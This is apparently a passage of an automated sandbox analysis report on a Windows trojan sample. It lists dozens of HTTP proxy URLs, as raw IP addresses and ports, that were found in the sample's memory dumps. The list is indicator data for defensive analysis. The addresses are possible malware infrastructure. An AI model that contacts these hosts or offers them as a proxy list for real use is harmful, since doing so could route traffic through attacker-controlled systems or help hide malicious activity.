                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C69EE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C69E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.84.142.117:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C69E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.84.142.117:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.84.142.227:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.84.142.227:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.84.142.27:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.84.142.27:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C81D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.85.58.149
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.85.58.149://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.85.58.149:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.92.116.77:6389
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.92.116.77:6389://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.133.57.22:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.133.57.22:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.248.213.236:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.248.213.236:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.50.208.37:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.50.208.37:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA59C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA5F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.50.209.50:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA5F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.50.209.50:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.50.213.149:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.50.213.149:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.50.215.37:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.50.215.37:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.50.241.99:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.50.241.99:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.50.250.163:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.50.250.163:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.50.253.163:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://155.50.253.163:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.200.116.68:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.200.116.68:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.200.116.68:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.200.116.68:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C758D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.200.116.71:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.200.116.71:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.200.116.73:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.200.116.73:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.200.116.74:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.200.116.74:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.200.116.74:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.200.116.74:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.239.144.149:10001
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.239.144.149:10001://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.239.144.87:10001
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.239.144.87:10001://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.54.240.53:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.54.240.53:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.67.172.185:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.67.172.185:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.67.217.159
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.67.217.159://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.67.217.159:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.100.55.143:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.100.55.143:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.100.6.202:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.100.6.202:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.119.222.22:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.119.222.22:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.119.225.225:83
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.119.225.225:83://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.230.111.195:15080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.230.111.195:15080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.230.226.230:1202
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.230.226.230:1202://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.230.33.25:8000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.230.33.25:8000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.245.131.28:30422
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.245.131.28:30422://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.25.92.74:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.25.92.74:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.101.197.81:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.101.197.81:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.101.28.215
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.101.28.215://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.101.28.215:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB346000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.160.141.139:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.160.141.139:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.181.138.19:8081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.181.138.19:8081x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.181.22.139:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.181.22.139:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.220.91.229:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.220.91.229:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA52D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.220.91.232:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA29E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.220.91.232:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.247.237.223:7801
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.247.237.223:7801://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.255.215.50:16993
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.255.215.50:16993://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.69.7.48:8050
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.69.7.48:8050://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6EBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.121.240:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6EBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.121.240:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.138.170:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.138.170:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.139.178:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.139.178:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.232.226:52335
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.232.226:52335://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.240.35:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.240.35:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.104.153:8200
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.104.153:8200://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.105.85:7497
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.105.85:7497://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.137.249:30433
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.137.249:30433://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6D9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.137.249:49785
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6D9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.137.249:49785://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.137.249:5018
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.137.249:5018://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA72F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA97B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.5.54:58249
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.5.54:58249://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.61.169:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.61.169:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.117.14:24006
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.117.14:24006://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.118.43:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.118.43:8080://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDC0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:1372
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:1372://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C853A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:45537
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:45537://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.37.182:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.37.182:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.45.192:8080
